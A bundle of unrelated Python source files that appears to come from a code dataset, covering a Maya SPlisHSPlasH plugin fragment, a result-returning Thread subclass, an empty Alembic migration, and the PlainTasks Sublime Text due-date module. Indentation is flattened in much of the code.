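#                3 x float32 scale, 1-byte bool isWall, 4 x float32 RGBA color
#   per body:    3 x float32 translation, 9 x float32 rotation matrix
# Subsequent frame files contain only the per-body translations and rotations.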
class loadRigidBodiesCmd(OpenMayaMPx.MPxCommand):
s_name = "loadRigidBodies"
def __init__(self):
OpenMayaMPx.MPxCommand.__init__(self)
@staticmethod
def creator():
return loadRigidBodiesCmd()
def doIt(self, args):
self.addedNodes = []
self.firstFileName = cmds.fileDialog2(ff="*.bin", fm=1, dir="")[0]
indexlist = re.findall(r'\d+', self.firstFileName)
if len(indexlist) == 0:
cmds.warning("No frame index found in file name.")
return
self.firstFrame = int(indexlist[-1])
self.redoIt()
def redoIt(self):
self.loadRigidBodies()
def loadRigidBodies(self):
folderName = os.path.dirname(self.firstFileName)
frameNumber = self.firstFrame
firstFile = open(self.firstFileName, 'rb')
# read number of bodies
bytes = firstFile.read()
firstFile.close()
(numBodies,), bytes = struct.unpack('i', bytes[:4]), bytes[4:]
objFiles = []
transformNodes = []
for i in range(0, numBodies):
# determine length of file name string
(strLength,), bytes = struct.unpack('i', bytes[:4]), bytes[4:]
# read file name
objFile, bytes = bytes[:strLength], bytes[strLength:]
# Check for duplicates and create instances
if objFile in objFiles:
idx = objFiles.index(objFile)
newNodes = cmds.duplicate(transformNodes[idx], instanceLeaf= True)
transformNodes.append(newNodes[0])
self.addedNodes.append(newNodes)
else:
objFileName = os.path.join(folderName, objFile)
newNodes = cmds.file(objFileName, i=True, rnn=True, type="OBJ", options="mo=1")
transformNodes.append(newNodes[0])
objFiles.append(objFile)
self.addedNodes.append(newNodes)
# Read scaling factors in first file
(sx,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(sy,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(sz,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
cmds.scale(sx, sy, sz, transformNodes[i])
(isWall,), bytes = struct.unpack('?', bytes[:1]), bytes[1:]
(colr,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(colg,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(colb,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(cola,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
if isWall:
cmds.setAttr((transformNodes[i] + '.visibility'), 0)
cmds.setKeyframe(transformNodes[i], at="s", t=1)
if frameNumber > 1:
cmds.setKeyframe(transformNodes[i], at="visibility", t=1, value=0)
if not isWall:
cmds.setKeyframe(transformNodes[i], at="visibility", t=frameNumber, value=1)
# load transformations
for i in range(0, numBodies):
# Read translation in first file
(x,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(y,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(z,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
# Read rotation in first file
r = []
for j in range(0,9):
(value,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
r.append(value)
cmds.xform(transformNodes[i], p=True, m=[r[0],r[1],r[2],0,r[3],r[4],r[5],0,r[6],r[7],r[8],0,x,y,z,1])
cmds.setKeyframe(transformNodes[i], at="t", t=frameNumber)
cmds.setKeyframe(transformNodes[i], at="r", t=frameNumber)
# read other files
idx = self.firstFileName.rfind(str(frameNumber))
l = len(str(frameNumber))
chk = True
while chk:
frameNumber += 1
fileName = str(self.firstFileName[0:idx]) + str(frameNumber) + str(self.firstFileName[idx+l:])
chk = os.path.exists(fileName)
if chk:
f = open(fileName, 'rb')
bytes = f.read()
f.close()
# load transformations
for i in range(0, numBodies):
# Read translation in file
(x,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(y,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
(z,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
# Read rotation in file
r = []
for j in range(0,9):
(value,), bytes = struct.unpack('f', bytes[:4]), bytes[4:]
r.append(value)
cmds.xform(transformNodes[i], p=True, m=[r[0],r[1],r[2],0,r[3],r[4],r[5],0,r[6],r[7],r[8],0,x,y,z,1])
cmds.setKeyframe(transformNodes[i], at="t", t=frameNumber)
cmds.setKeyframe(transformNodes[i], at="r", t=frameNumber)
cmds.currentTime(1)
def undoIt(self):
for node in self.addedNodes:
            print(node)
cmds.delete(node)
def isUndoable(self):
return True
######################################################
# createSPHMenu
######################################################
def createSPHMenu():
global menuId
menuId = cmds.menu( label='SPlisHSPlasH', p="MayaWindow" )
cmds.menuItem(divider=True, dividerLabel="Scene generating")
cmds.menuItem( label='Add scene configuration',command=
'if "SPH_Config" not in cmds.ls( type="transform"):\n' +
' cmds.createNode("transform", name="SPH_Config")\n' +
'cmds.createNode("SPHConfigurationNode", name="Configuration", parent="SPH_Config")')
cmds.menuItem( label='Add fluid material',command=
'if "SPH_Fluid_Material" not in cmds.ls( type="transform"):\n' +
' cmds.createNode("transform", name="SPH_Fluid_Material")\n' +
'cmds.createNode("SPHFluidConfigurationNode", name="Fluid", parent="SPH_Fluid_Material")')
cmds.menuItem(divider=True)
cmds.menuItem( label='Convert selection to fluid',command='cmds.convertToFluid()' )
cmds.menuItem( label='Convert selection to rigid bodies',command='cmds.convertToRigidBodies()' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Create rectangular emitter',command='cmds.createRectangularEmitter()' )
cmds.menuItem( label='Create circular emitter',command='cmds.createCircularEmitter()' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Create box animation field',command='cmds.createAnimationField(s=0)' )
cmds.menuItem( label='Create sphere animation field',command='cmds.createAnimationField(s=1)' )
cmds.menuItem( label='Create cylinder animation field',command='cmds.createAnimationField(s=2)' )
cmds.menuItem(divider=True)
cmds.menuItem( label='Save scene',command='cmds.saveModel()' )
cmds.menuItem(divider=True, dividerLabel="Import")
cmds.menuItem( label='Load rigid body data',command='cmds.loadRigidBodies()' )
######################################################
# deleteSPHMenu
######################################################
def deleteSPHMenu():
global menuId
cmds.deleteUI(menuId)
return
# Initialize the script plug-in
def initializePlugin(mobject):
global settingsWinId
global fluidWinId
global menuId
global fluidIds
global sphParameters
global fluidParameters
mplugin = OpenMayaMPx.MFnPlugin(mobject, "SPlisHSPlasH", "1.0", "Any")
settingsWinId = ""
fluidWinId = ""
menuId = ""
fluidIds = ["Fluid"]
try:
mplugin.registerNode( SPHConfigurationNode.kPluginNodeTypeName, SPHConfigurationNode.kPluginNodeId, SPHConfigurationNode.creator, SPHConfigurationNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHFluidConfigurationNode.kPluginNodeTypeName, SPHFluidConfigurationNode.kPluginNodeId, SPHFluidConfigurationNode.creator, SPHFluidConfigurationNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHFluidNode.kPluginNodeTypeName, SPHFluidNode.kPluginNodeId, SPHFluidNode.creator, SPHFluidNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerNode( SPHRigidBodyNode.kPluginNodeTypeName, SPHRigidBodyNode.kPluginNodeId, SPHRigidBodyNode.creator, SPHRigidBodyNode.initialize, OpenMayaMPx.MPxNode.kLocatorNode )
mplugin.registerCommand(createRectangularEmitterCmd.s_name, createRectangularEmitterCmd.creator)
mplugin.registerCommand(createCircularEmitterCmd.s_name, createCircularEmitterCmd.creator)
mplugin.registerCommand(saveModelCmd.s_name, saveModelCmd.creator)
mplugin.registerCommand(convertToFluidCmd.s_name, convertToFluidCmd.creator)
mplugin.registerCommand(convertToRigidBodiesCmd.s_name, convertToRigidBodiesCmd.creator)
mplugin.registerCommand(createAnimationFieldCmd.s_name, createAnimationFieldCmd.creator, createAnimationFieldCmd.syntaxCreator)
mplugin.registerCommand(loadRigidBodiesCmd.s_name, loadRigidBodiesCmd.creator)
except:
sys.stderr.write( "Failed to register nodes." )
raise
createSPHMenu()
# Uninitialize the script plug-in
def uninitializePlugin(mobject):
mplugin = OpenMayaMPx.MFnPlugin(mobject)
deleteSPHMenu()
try:
mplugin.deregisterCommand(createRectangularEmitterCmd.s_name)
mplugin.deregisterCommand(createCircularEmitterCmd.s_name)
mplugin.deregisterCommand(saveModelCmd.s_name)
mplugin.deregisterCommand(convertToFluidCmd.s_name)
mplugin.deregisterCommand(convertToRigidBodiesCmd.s_name)
mplugin.deregisterCommand(createAnimationFieldCmd.s_name)
mplugin.deregisterCommand(loadRigidBodiesCmd.s_name)
mplugin.deregisterNode( SPHRigidBodyNode.kPluginNodeId )
mplugin.deregisterNode( SPHFluidNode.kPluginNodeId )
mplugin.deregisterNode( SPHFluidConfigurationNode.kPluginNodeId )
mplugin.deregisterNode( SPHConfigurationNode.kPluginNodeId )
except:
sys.stderr.write( "Failed to deregister node")
raise
| nilq/baby-python | python |
from threading import current_thread
from threading import Thread as _Thread
class Thread(_Thread):
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None):
super().__init__(group, target, name, args, kwargs)
self.done = False
self.result = None
self.start()
def run(self):
try:
if self._target:
self.result = self._target(*self._args, **self._kwargs)
finally:
del self._target, self._args, self._kwargs
self.done = True
def join(self, timeout=None):
if not self._initialized:
raise RuntimeError("Thread.__init__() n t called")
if not self._started.is_set():
raise RuntimeError("cannot join thread before it is started")
if self is current_thread():
raise RuntimeError("cannot join current thread")
if timeout is None:
self._wait_for_tstate_lock()
else:
self._wait_for_tstate_lock(timeout=max(timeout, 0))
if self.done:
return self.result
def _chunker(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
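# Usage sketch: the Thread subclass starts itself on construction and join()
# returns the target's result once the thread has finished.
if __name__ == '__main__':
    def square(x):
        return x * x

    workers = [Thread(target=square, args=(n,)) for n in range(4)]
    print([t.join() for t in workers])  # [0, 1, 4, 9]

    # _chunker lazily splits a sequence into fixed-size chunks
    print(list(_chunker(list(range(7)), 3)))  # [[0, 1, 2], [3, 4, 5], [6]]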
| nilq/baby-python | python |
"""baseline
Revision ID: bb972e06e6f7
Revises:
Create Date: 2020-01-22 23:03:09.267552
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'bb972e06e6f7'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
pass
def downgrade():
pass
| nilq/baby-python | python |
# coding: utf-8
import sublime, sublime_plugin
import json
import re
import locale
import calendar
import itertools
from datetime import datetime
from datetime import timedelta
NT = sublime.platform() == 'windows'
ST3 = int(sublime.version()) >= 3000
if ST3:
from .APlainTasksCommon import PlainTasksBase, PlainTasksEnabled, PlainTasksFold
MARK_SOON = sublime.DRAW_NO_FILL
MARK_INVALID = sublime.DRAW_NO_FILL | sublime.DRAW_NO_OUTLINE | sublime.DRAW_SQUIGGLY_UNDERLINE
else:
from APlainTasksCommon import PlainTasksBase, PlainTasksEnabled, PlainTasksFold
MARK_SOON = MARK_INVALID = 0
sublime_plugin.ViewEventListener = object
try: # unavailable dependencies shall not break basic functionality
from dateutil import parser as dateutil_parser
from dateutil.relativedelta import relativedelta
except:
dateutil_parser = None
if ST3:
locale.setlocale(locale.LC_ALL, '')
def is_yearfirst(date_format):
return date_format.strip('( )').startswith(('%y', '%Y'))
def is_dayfirst(date_format):
    return date_format.strip('( )').startswith('%d')
def _convert_date(matchstr, now):
match_obj = re.search(r'''(?mxu)
(?:\s*
(?P<yearORmonthORday>\d*(?!:))
(?P<sep>[-\.])?
(?P<monthORday>\d*)
(?P=sep)?
(?P<day>\d*)
(?! \d*:)(?# e.g. '23:' == hour, but '1 23:' == day=1, hour=23)
)?
\s*
(?:
(?P<hour>\d*)
:
(?P<minute>\d*)
)?''', matchstr)
year = now.year
month = now.month
day = int(match_obj.group('day') or 0)
# print(day)
if day:
year = int(match_obj.group('yearORmonthORday'))
month = int(match_obj.group('monthORday'))
else:
day = int(match_obj.group('monthORday') or 0)
# print(day)
if day:
month = int(match_obj.group('yearORmonthORday'))
if month < now.month:
year += 1
else:
day = int(match_obj.group('yearORmonthORday') or 0)
# print(day)
if 0 < day <= now.day:
# expect next month
month += 1
if month == 13:
year += 1
month = 1
elif not day: # @due(0) == today
day = now.day
# else would be day>now, i.e. future day in current month
hour = match_obj.group('hour') or now.hour
minute = match_obj.group('minute') or now.minute
hour, minute = int(hour), int(minute)
if year < 100:
year += 2000
# print(year, month, day, hour, minute)
return year, month, day, hour, minute
def convert_date(matchstr, now):
year = month = day = hour = minute = None
try:
year, month, day, hour, minute = _convert_date(matchstr, now)
date = datetime(year, month, day, hour, minute, 0)
except (ValueError, OverflowError) as e:
return None, (e, year, month, day, hour, minute)
else:
return date, None
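# Illustrative conversions (assuming now = datetime(2016, 2, 14, 18, 0)):
#   convert_date('28', now)          -> Feb 28 2016, 18:00 (later this month)
#   convert_date('10', now)          -> Mar 10 2016, 18:00 (day already past, so next month)
#   convert_date('3-1', now)         -> Mar  1 2016, 18:00 (month-day)
#   convert_date('16-3-1 9:30', now) -> Mar  1 2016, 09:30 (year-month-day hour:minute)
#   convert_date('0', now)           -> today at the current time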
def increase_date(view, region, text, now, date_format):
# relative from date of creation if any
if '++' in text:
line = view.line(region)
line_content = view.substr(line)
created = re.search(r'(?mxu)@created\(([\d\w,\.:\-\/ @]*)\)', line_content)
if created:
created_date, error = parse_date(created.group(1),
date_format=date_format,
yearfirst=is_yearfirst(date_format),
dayfirst=is_dayfirst(date_format),
default=now)
if error:
ln = (view.rowcol(line.a)[0] + 1)
print(u'\nPlainTasks:\nError at line %d\n\t%s\ncaused by text:\n\t"%s"\n' % (ln, error, created.group(0)))
sublime.status_message(u'@created date is invalid at line %d, see console for details' % ln)
else:
now = created_date
match_obj = re.search(r'''(?mxu)
\s*\+\+?\s*
(?:
(?P<number>\d*(?![:.]))\s*
(?P<days>[Dd]?)
(?P<weeks>[Ww]?)
(?! \d*[:.])
)?
\s*
(?:
(?P<hour>\d*)
[:.]
(?P<minute>\d*)
)?''', text)
number = int(match_obj.group('number') or 0)
days = match_obj.group('days')
weeks = match_obj.group('weeks')
hour = int(match_obj.group('hour') or 0)
minute = int(match_obj.group('minute') or 0)
if not (number or hour or minute) or (not number and (days or weeks)):
# set 1 if number is ommited, i.e.
# @due(+) == @due(+1) == @due(+1d)
# @due(+w) == @due(+1w)
number = 1
delta = error = None
amount = number * 7 if weeks else number
try:
delta = now + timedelta(days=(amount), hours=hour, minutes=minute)
except (ValueError, OverflowError) as e:
error = e, amount, hour, minute
return delta, error
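# Relative-date syntax handled by increase_date (illustrative):
#   @due(+)       -> now + 1 day          @due(+w)  -> now + 1 week
#   @due(+3d)     -> now + 3 days         @due(+2w) -> now + 2 weeks
#   @due(+1 2:30) -> now + 1 day, 2 h 30 min
#   @due(++2)     -> 2 days after the task's @created date, if present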
def expand_short_date(view, start, end, now, date_format):
while view.substr(start) != '(':
start -= 1
while view.substr(end) != ')':
end += 1
region = sublime.Region(start + 1, end)
text = view.substr(region)
# print(text)
if '+' in text:
date, error = increase_date(view, region, text, now, date_format)
else:
date, error = parse_date(text,
date_format,
yearfirst=is_yearfirst(date_format),
dayfirst=is_dayfirst(date_format),
default=now)
return date, error, sublime.Region(start, end + 1)
def parse_date(date_string, date_format='(%y-%m-%d %H:%M)', yearfirst=True, dayfirst=False, default=None):
'''
Attempt to convert arbitrary string to datetime object
date_string
Unicode
date_format
Unicode
    yearfirst
        bool
    dayfirst
        bool
default
datetime object (now)
'''
#print("[date_string]", date_string, "[format] ", date_format)
try:
return datetime.strptime(date_string, date_format), None
except ValueError as e:
# print("[ValueError]:", e)
pass
bare_date_string = date_string.strip('( )')
items = len(bare_date_string.split('-' if '-' in bare_date_string else '.'))
try:
#[HKC] Initially it was < 3, but date_string of "233" will be converted to
# year of 0233, which is silly
if items == 1 and len(bare_date_string) <= 3:
raise Exception("Invalid date_string:", date_string)
if items < 2 and len(bare_date_string) < 3:
# e.g. @due(1) is always first day of next month,
# but dateutil consider it 1st day of current month
raise Exception("Special case of short date: less than 2 numbers")
if items < 3 and any(s in date_string for s in '-.'):
            # e.g. @due(2-1) is always February 1st of next year,
# but dateutil consider it this year
raise Exception("Special case of short date: less than 3 numbers")
date = dateutil_parser.parse(bare_date_string,
yearfirst=yearfirst,
dayfirst=dayfirst,
default=default)
#print("[Parsed Date]", date)
if all((date.year < 1900, '%y' in date_format)):
return None, ('format %y requires year >= 1900', date.year, date.month, date.day, date.hour, date.minute)
except Exception as e:
#print("[Exception]:", e, "[date_string]:", date_string)
date, error = convert_date(bare_date_string, default)
else:
error = None
return date, error
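# Hedged illustration (comment-only, since this module needs the Sublime
# runtime to import). With an exactly matching format string, parse_date takes
# the strptime fast path; anything else falls through to dateutil, with the
# short-date special cases guarded above:
#
#     parse_date('(21-03-05 10:30)', date_format='(%y-%m-%d %H:%M)')
#     # -> (datetime(2021, 3, 5, 10, 30), None)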
def format_delta(view, delta):
delta -= timedelta(microseconds=delta.microseconds)
if view.settings().get('decimal_minutes', False):
days = delta.days
delta = u'%s%s%s%s' % (days or '', ' day, ' if days == 1 else '', ' days, ' if days > 1 else '', '%.2f' % (delta.seconds / 3600.0) if delta.seconds else '')
else:
delta = str(delta)
        if delta[~7:] == ' 0:00:00' or delta == '0:00:00':  # strip meaningless time; ~7 == -8, i.e. the last 8 chars
            delta = delta[:~6]
        elif delta[~2:] == ':00':  # strip meaningless seconds
            delta = delta[:~2]
return delta.strip(' ,')
class PlainTasksToggleHighlightPastDue(PlainTasksEnabled):
def run(self, edit):
highlight_on = self.view.settings().get('highlight_past_due', True)
self.view.erase_regions('past_due')
self.view.erase_regions('due_soon')
self.view.erase_regions('misformatted')
if not highlight_on:
return
pattern = r'@due(\([^@\n]*\))'
dates_strings = []
dates_regions = self.view.find_all(pattern, 0, '\\1', dates_strings)
if not dates_regions:
if ST3:
self.view.settings().set('plain_tasks_remain_time_phantoms', [])
return
past_due, due_soon, misformatted, phantoms = self.group_due_tags(dates_strings, dates_regions)
scope_past_due = self.view.settings().get('scope_past_due', 'string.other.tag.todo.critical')
scope_due_soon = self.view.settings().get('scope_due_soon', 'string.other.tag.todo.high')
scope_misformatted = self.view.settings().get('scope_misformatted', 'string.other.tag.todo.low')
icon_past_due = self.view.settings().get('icon_past_due', 'circle')
icon_due_soon = self.view.settings().get('icon_due_soon', 'dot')
icon_misformatted = self.view.settings().get('icon_misformatted', '')
self.view.add_regions('past_due', past_due, scope_past_due, icon_past_due)
self.view.add_regions('due_soon', due_soon, scope_due_soon, icon_due_soon, MARK_SOON)
self.view.add_regions('misformatted', misformatted, scope_misformatted, icon_misformatted, MARK_INVALID)
if not ST3:
return
if self.view.settings().get('show_remain_due', False):
self.view.settings().set('plain_tasks_remain_time_phantoms', phantoms)
else:
self.view.settings().set('plain_tasks_remain_time_phantoms', [])
def group_due_tags(self, dates_strings, dates_regions):
past_due, due_soon, misformatted, phantoms = [], [], [], []
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
yearfirst = is_yearfirst(date_format)
now = datetime.now()
default = now - timedelta(seconds=now.second, microseconds=now.microsecond) # for short dates w/o time
due_soon_threshold = self.view.settings().get('highlight_due_soon', 24) * 60 * 60
for i, region in enumerate(dates_regions):
if any(s in self.view.scope_name(region.a) for s in ('completed', 'cancelled')):
continue
text = dates_strings[i]
if '+' in text:
date, error = increase_date(self.view, region, text, default, date_format)
# print(date, date_format)
else:
date, error = parse_date(text,
date_format=date_format,
yearfirst=yearfirst,
dayfirst=is_dayfirst(date_format),
default=default)
# print(date, date_format, yearfirst)
if error:
# print(error)
misformatted.append(region)
else:
if now >= date:
past_due.append(region)
phantoms.append((region.a, '-' + format_delta(self.view, default - date)))
else:
phantoms.append((region.a, format_delta(self.view, date - default)))
if due_soon_threshold:
td = (date - now)
# timedelta.total_seconds() is not available in 2.6.x
time_left = (td.microseconds + (td.seconds + td.days * 24 * 3600) * 10**6) / 10.0**6
if time_left < due_soon_threshold:
due_soon.append(region)
return past_due, due_soon, misformatted, phantoms
class PlainTasksHLDue(sublime_plugin.EventListener):
def on_activated(self, view):
if not view.score_selector(0, "text.todo") > 0:
return
view.run_command('plain_tasks_toggle_highlight_past_due')
def on_post_save(self, view):
self.on_activated(view)
def on_load(self, view):
self.on_activated(view)
class PlainTasksFoldToDueTags(PlainTasksFold):
def run(self, edit):
if not self.view.settings().get('highlight_past_due', True):
return sublime.message_dialog('highlight_past_due setting must be true')
self.view.run_command('plain_tasks_toggle_highlight_past_due')
dues = sorted(self.view.line(r) for r in (self.view.get_regions('past_due') + self.view.get_regions('due_soon')))
if not dues:
return sublime.message_dialog('No overdue tasks.\nCongrats!')
self.exec_folding(self.add_projects_and_notes(dues))
class PlainTasksCalculateTotalTimeForProject(PlainTasksEnabled):
def run(self, edit, start):
line = self.view.line(int(start))
total, eol = self.calc_total_time_for_project(line)
if total:
self.view.insert(edit, eol, ' @total(%s)' % format_delta(self.view, total).rstrip(', '))
def calc_total_time_for_project(self, line):
        # view.find_all with a format template turns each matched tag into a
        # JSON object of its captured time components (empty groups become "")
        pattern = r'(?<=\s)@(lasted|wasted|total)\([ \t]*(?:(\d+)[ \t]*days?,?)?[ \t]*((?:(\d+)\:(\d+)\:?(\d+)?)|(?:(\d+)\.(\d+)))?[ \t]*\)'
        format = '{"days": "\\2", "hours": "\\4", "minutes": "\\5", "seconds": "\\6", "dhours": "\\7", "dminutes": "\\8"}'
lasted_strings = []
lasted_regions = self.view.find_all(pattern, 0, format, lasted_strings)
if not lasted_regions:
return 0, 0
eol = line.end()
project_block = self.view.indented_region(eol + 1)
total = timedelta()
for i, region in enumerate(lasted_regions):
if not all((region > line, region.b <= project_block.b)):
continue
t = json.loads(lasted_strings[i].replace('""', '"0"'))
total += timedelta(days=int(t['days']),
hours=int(t['hours']) or int(t['dhours']),
minutes=int(t['minutes']) or int(t['dminutes']) * 60,
seconds=int(t['seconds']))
return total, eol
class PlainTasksCalculateTimeForTask(PlainTasksEnabled):
def run(self, edit, started_matches, toggle_matches, now, eol, tag='lasted'):
'''
started_matches
list of Unicode objects
toggle_matches
list of Unicode objects
now
Unicode object, moment of completion or cancellation of a task
eol
int as str (abs. point of end of task line without line break)
tag
Unicode object (lasted for complete, wasted for cancelled)
'''
if not started_matches:
return
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
start = datetime.strptime(started_matches[0], date_format)
end = datetime.strptime(now, date_format)
toggle_times = [datetime.strptime(toggle, date_format) for toggle in toggle_matches]
all_times = [start] + toggle_times + [end]
pairs = zip(all_times[::2], all_times[1::2])
deltas = [pair[1] - pair[0] for pair in pairs]
delta = format_delta(self.view, sum(deltas, timedelta()))
tag = ' @%s(%s)' % (tag, delta.rstrip(', ') if delta else ('a bit' if '%H' in date_format else 'less than day'))
eol = int(eol)
if self.view.substr(sublime.Region(eol - 2, eol)) == ' ':
eol -= 2 # keep double whitespace at eol
self.view.insert(edit, eol, tag)
class PlainTasksReCalculateTimeForTasks(PlainTasksEnabled):
def run(self, edit):
started = r'^\s*[^\b]*?\s*@started(\([\d\w,\.:\-\/ @]*\)).*$'
toggle = r'@toggle(\([\d\w,\.:\-\/ @]*\))'
calculated = r'([ \t]@[lw]asted\([\d\w,\.:\-\/ @]*\))'
done = r'^\s*[^\b]*?\s*@(done|cancell?ed)[ \t]*(\([\d\w,\.:\-\/ @]*\)).*$'
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
default_now = datetime.now().strftime(date_format)
regions = itertools.chain(*(reversed(self.view.lines(region)) for region in reversed(list(self.view.sel()))))
for line in regions:
current_scope = self.view.scope_name(line.a)
if not any(s in current_scope for s in ('completed', 'cancelled')):
continue
line_contents = self.view.substr(line)
done_match = re.match(done, line_contents, re.U)
now = done_match.group(2) if done_match else default_now
started_matches = re.findall(started, line_contents, re.U)
toggle_matches = re.findall(toggle, line_contents, re.U)
calc_matches = re.findall(calculated, line_contents, re.U)
for match in calc_matches:
line_contents = line_contents.replace(match, '')
self.view.replace(edit, line, line_contents)
self.view.run_command(
'plain_tasks_calculate_time_for_task', {
'started_matches': started_matches,
'toggle_matches': toggle_matches,
'now': now,
'eol': line.begin() + len(line_contents),
'tag': 'lasted' if 'completed' in current_scope else 'wasted'}
)
class PlainTaskInsertDate(PlainTasksBase):
def runCommand(self, edit, region=None, date=None):
if region:
y, m, d, H, M = date
region = sublime.Region(*region)
self.view.replace(edit, region, datetime(y, m, d, H, M, 0).strftime(self.date_format) + ' ')
self.view.sel().clear()
self.view.sel().add(sublime.Region(self.view.line(region).b))
return
for s in reversed(list(self.view.sel())):
self.view.insert(edit, s.b, datetime.now().strftime(self.date_format))
class PlainTasksReplaceShortDate(PlainTasksBase):
def runCommand(self, edit):
s = self.view.sel()[0]
date, error, region = expand_short_date(self.view, s.a, s.b, datetime.now(), self.date_format)
if not date:
sublime.error_message(
'PlainTasks:\n\n'
'{0}:\n days:\t{1}\n hours:\t{2}\n minutes:\t{3}\n'.format(*error) if len(error) == 4 else
'{0}:\n year:\t{1}\n month:\t{2}\n day:\t{3}\n HH:\t{4}\n MM:\t{5}\n'.format(*error))
return
date = date.strftime(self.date_format)
self.view.replace(edit, region, date)
offset = region.a + len(date)
self.view.sel().clear()
self.view.sel().add(sublime.Region(offset, offset))
class PlainTasksViewEventListener(sublime_plugin.ViewEventListener):
@classmethod
def is_applicable(cls, settings):
return settings.get('syntax') in ('Packages/PlainTasks/PlainTasks.sublime-syntax', 'Packages/PlainTasks/PlainTasks.tmLanguage')
class PlainTasksPreviewShortDate(PlainTasksViewEventListener):
def __init__(self, view):
self.view = view
self.phantoms = sublime.PhantomSet(view, 'plain_tasks_preview_short_date')
def on_selection_modified_async(self):
self.phantoms.update([]) # https://github.com/SublimeTextIssues/Core/issues/1497
s = self.view.sel()[0]
if not (s.empty() and 'meta.tag.todo' in self.view.scope_name(s.a)):
return
rgn = self.view.extract_scope(s.a)
text = self.view.substr(rgn)
match = re.match(r'@due\(([^@\n]*)\)[\s$]*', text)
# print(s, rgn, text)
if not match:
return
# print(match.group(1))
preview_offset = self.view.settings().get('due_preview_offset', 0)
remain_format = self.view.settings().get('due_remain_format', '{time} remaining')
overdue_format = self.view.settings().get('due_overdue_format', '{time} overdue')
date_format = self.view.settings().get('date_format', '(%y-%m-%d %H:%M)')
start = rgn.a + 5 # within parenthesis
now = datetime.now().replace(second=0, microsecond=0)
date, error, region = expand_short_date(self.view, start, start, now, date_format)
upd = []
if not error:
if now >= date:
delta = '-' + format_delta(self.view, now - date)
else:
delta = format_delta(self.view, date - now)
content = (overdue_format if '-' in delta else remain_format).format(time=delta.lstrip('-') or 'a little bit')
if content:
if self.view.settings().get('show_remain_due', False):
# replace existing remain/overdue phantom
phantoms = self.view.settings().get('plain_tasks_remain_time_phantoms', [])
for index, (point, _) in enumerate(phantoms):
if point == region.a - 4:
phantoms[index] = [point, str(delta)]
self.view.settings().set('plain_tasks_remain_time_phantoms', phantoms)
break
else:
upd.append(sublime.Phantom(
sublime.Region(region.a - 4),
content,
sublime.LAYOUT_BELOW))
date = date.strftime(date_format).strip('()')
if date == match.group(1).strip():
self.phantoms.update(upd)
return
upd.append(sublime.Phantom(
sublime.Region(region.b - preview_offset),
date or (
'{0}:<br> days:\t{1}<br> hours:\t{2}<br> minutes:\t{3}<br>'.format(*error) if len(error) == 4 else
'{0}:<br> year:\t{1}<br> month:\t{2}<br> day:\t{3}<br> HH:\t{4}<br> MM:\t{5}<br>'.format(*error)),
sublime.LAYOUT_INLINE))
self.phantoms.update(upd)
class PlainTasksChooseDate(sublime_plugin.ViewEventListener):
def __init__(self, view):
self.view = view
@classmethod
def is_applicable(cls, settings):
return settings.get('show_calendar_on_tags')
def on_selection_modified_async(self):
s = self.view.sel()[0]
if not (s.empty() and any('meta.tag.todo ' in self.view.scope_name(n) for n in (s.a, s.a - 1))):
return
self.view.run_command('plain_tasks_calendar', {'point': s.a})
class PlainTasksCalendar(sublime_plugin.TextCommand):
def is_visible(self):
return ST3
def run(self, edit, point=None):
point = point or self.view.sel()[0].a
self.region, tag = self.extract_tag(point)
content = self.generate_calendar()
self.view.show_popup(content, sublime.COOPERATE_WITH_AUTO_COMPLETE, self.region.a, 555, 555, self.action)
def extract_tag(self, point):
'''point is cursor
Return tuple of two elements
Region
            which will be replaced with the chosen date; it may be the parentheses belonging to the tag, the end of the tag, or point
Unicode
tag under cursor (i.e. point)
'''
start = end = point
tag_pattern = r'(?<=\s)(\@[^\(\) ,\.]+)([\w\d\.\(\)\-!? :\+]*)'
line = self.view.line(point)
matches = re.finditer(tag_pattern, self.view.substr(line))
for match in matches:
m_start = line.a + match.start(1)
m_end = line.a + match.end(2)
if m_start <= point <= m_end:
start = line.a + match.start(2)
end = m_end
break
else:
match = None
tag = match.group(0) if match else ''
return sublime.Region(start, end), tag
def generate_calendar(self, date=None):
date = date or datetime.now()
y, m, d, H, M = date.year, date.month, date.day, date.hour, date.minute
content = ('<style> #today {{color: var(--background); background-color: var(--foreground)}}</style>'
'<br> <center><big>{prev_month} {next_month} {month}'
' {prev_year} {next_year} {year}</big></center><br><br>'
'{table}<br> {time}<br><br><hr>'
'<br> Click day to insert date '
'<br> into view, click month or '
'<br> time to switch the picker <br><br>'
)
locale.setlocale(locale.LC_ALL, '') # to get native month name
month = '<a href="month:{0}-{1}-{2}-{3}-{4}">{5}</a>'.format(y, m, d, H, M, date.strftime('%B'))
prev_month = '<a href="prev_month:{0}-{1}-{2}-{3}-{4}">←</a>'.format(y, m, d, H, M)
next_month = '<a href="next_month:{0}-{1}-{2}-{3}-{4}">→</a>'.format(y, m, d, H, M)
prev_year = '<a href="prev_year:{0}-{1}-{2}-{3}-{4}">←</a>'.format(y, m, d, H, M)
next_year = '<a href="next_year:{0}-{1}-{2}-{3}-{4}">→</a>'.format(y, m, d, H, M)
year = '<a href="year:{0}-{1}-{2}-{3}-{4}">{0}</a>'.format(y, m, d, H, M)
table = ''
